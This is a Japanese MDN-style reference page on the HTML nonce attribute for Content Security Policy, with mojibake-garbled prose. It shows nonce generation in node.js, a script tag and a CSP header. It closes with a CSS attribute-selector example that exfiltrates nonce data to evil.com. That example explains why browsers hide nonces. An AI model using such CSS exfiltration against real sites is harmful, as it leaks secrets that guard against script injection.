Baseline Widely available
nonce ã°ãã¼ãã«å±æ§ã¯ã ããã¯æå·åãã³ã¹ ("number used once") ãå®ç¾©ããã³ã³ãã³ãå±æ§ã§ãã³ã³ãã³ãã»ãã¥ãªãã£ããªã·ã¼ãæå®ãããè¦ç´ ã«å¯¾ãã¦èªã¿åãã許å¯ãããã©ããã決å®ããããã«ä½¿ç¨ãããã¨ãã§ãã¾ãã
nonce å±æ§ã¯ãç¹å®ã®è¦ç´ ãä¾ãã°ç¹å®ã®ã¤ã³ã©ã¤ã³ã¹ã¯ãªãããã¹ã¿ã¤ã«è¦ç´ ã許å¯ãªã¹ãåããã®ã«æçãªãã®ã§ãã CSP ã® unsafe-inline ãã£ã¬ã¯ãã£ãã®ä½¿ç¨ãé¿ãããã¨ãã§ãããã¹ã¦ã®ã¤ã³ã©ã¤ã³ã¹ã¯ãªããã¾ãã¯ã¹ã¿ã¤ã«ã許å¯ãªã¹ãåãããã¨ãã§ãã¾ãã
ã¡ã¢: å®å
¨ã§ãªãã¤ã³ã©ã¤ã³ã®ã¹ã¯ãªããã ã¹ã¿ã¤ã«ã®ã³ã³ãã³ãã使ç¨ããªãæ¹æ³ããªãå ´åã®ã¿ã nonce ã使ç¨ãã¦ãã ããããã nonce ãå¿
è¦ãªãã®ã§ããã°ã使ç¨ããªãã§ãã ãããã¹ã¯ãªãããéçãªãã®ã§ããã°ã代ããã« CSP ããã·ã¥ã使ç¨ãããã¨ãã§ãã¾ãã ï¼å®å
¨ã§ãªãã¤ã³ã©ã¤ã³ã¹ã¯ãªããã®ä½¿ç¨ä¸ã®æ³¨æãåç
§ãã¦ãã ãããï¼ å¸¸ã« CSP ã®ä¿è·ãæ大éã«æ´»ç¨ãããã³ã¹ãå®å
¨ã§ãªãã¤ã³ã©ã¤ã³ã¹ã¯ãªãããå¯è½ãªéãé¿ããããã«ãã¦ãã ããã
ãã³ã¹æ©æ§ã使ç¨ããã¤ã³ã©ã¤ã³ã¹ã¯ãªããã許å¯ããããã«ã¯ãããã¤ãã®æé ãããã¾ãã
å¤ã®çæã¦ã§ããµã¼ãã¼ãããæå·çã«å®å ¨ãªä¹±æ°çºçå¨ãç¨ãã¦ãå°ãªãã¨ã 128 ãããã®ãã¼ã¿ãã©ã³ãã ã« Base64 ã¨ã³ã³ã¼ãããæååãçæãã¾ãããã³ã¹ã¯ãã¼ã¸ãèªã¿è¾¼ããã³ã«éã£ãå½¢ã§çæããå¿ è¦ãããã¾ãï¼ãã³ã¹ã¯ 1 åã ãï¼ãä¾ãã° node.js ã§ã次ã®ããã«è¡ãã¾ãã
import crypto from "node:crypto";
crypto.randomBytes(16).toString("base64");
// '8IBTHwOdqNKAWeKl7plt8g=='
ããã¯ã¨ã³ãã®ã³ã¼ãã§çæããããã³ã¹ã¯ãããã§è¨±å¯ãªã¹ãã«ãããã¤ã³ã©ã¤ã³ã¹ã¯ãªããã«ä½¿ç¨ããã¾ãã
<script nonce="8IBTHwOdqNKAWeKl7plt8g==">
// â¦
</script>
æå¾ã«ããã³ã¹ã®å¤ã Content-Security-Policy ãããã¼ã§éãå¿
è¦ãããã¾ãï¼nonce- ãåã«ä»ããï¼ã
Content-Security-Policy: script-src 'nonce-8IBTHwOdqNKAWeKl7plt8g=='
ã»ãã¥ãªãã£ä¸ã®çç±ãããã³ã³ãã³ãå±æ§ nonce ã¯é è½ããã¾ãï¼ç©ºæååãè¿ããã¾ãï¼ã
script.getAttribute("nonce"); // 空æååãè¿ã
nonce ããããã£ã¯ããã³ã¹ã«ã¢ã¯ã»ã¹ããããã®å¯ä¸ã®æ¹æ³ã§ãã
script.nonce; // ãã³ã¹ã®å¤ãè¿ã
ãã³ã¹ã®é è½ã¯ããã®ããã«ã³ã³ãã³ãå±æ§ãããã¼ã¿ãåå¾ããã¡ã«ããºã ã«ãã£ã¦ãæ»æè ããã³ã¹ãã¼ã¿ãæµåºããããã¨ãé²ãã®ã«å½¹ç«ã¡ã¾ãã
script[nonce~="whatever"] {
background: url("https://evil.com/nonce?whatever");
}
RetroSearch is an open source project built by @garambo | Open a GitHub Issue
Search and Browse the WWW like it's 1997 | Search results from DuckDuckGo
HTML:
3.2
| Encoding:
UTF-8
| Version:
0.7.4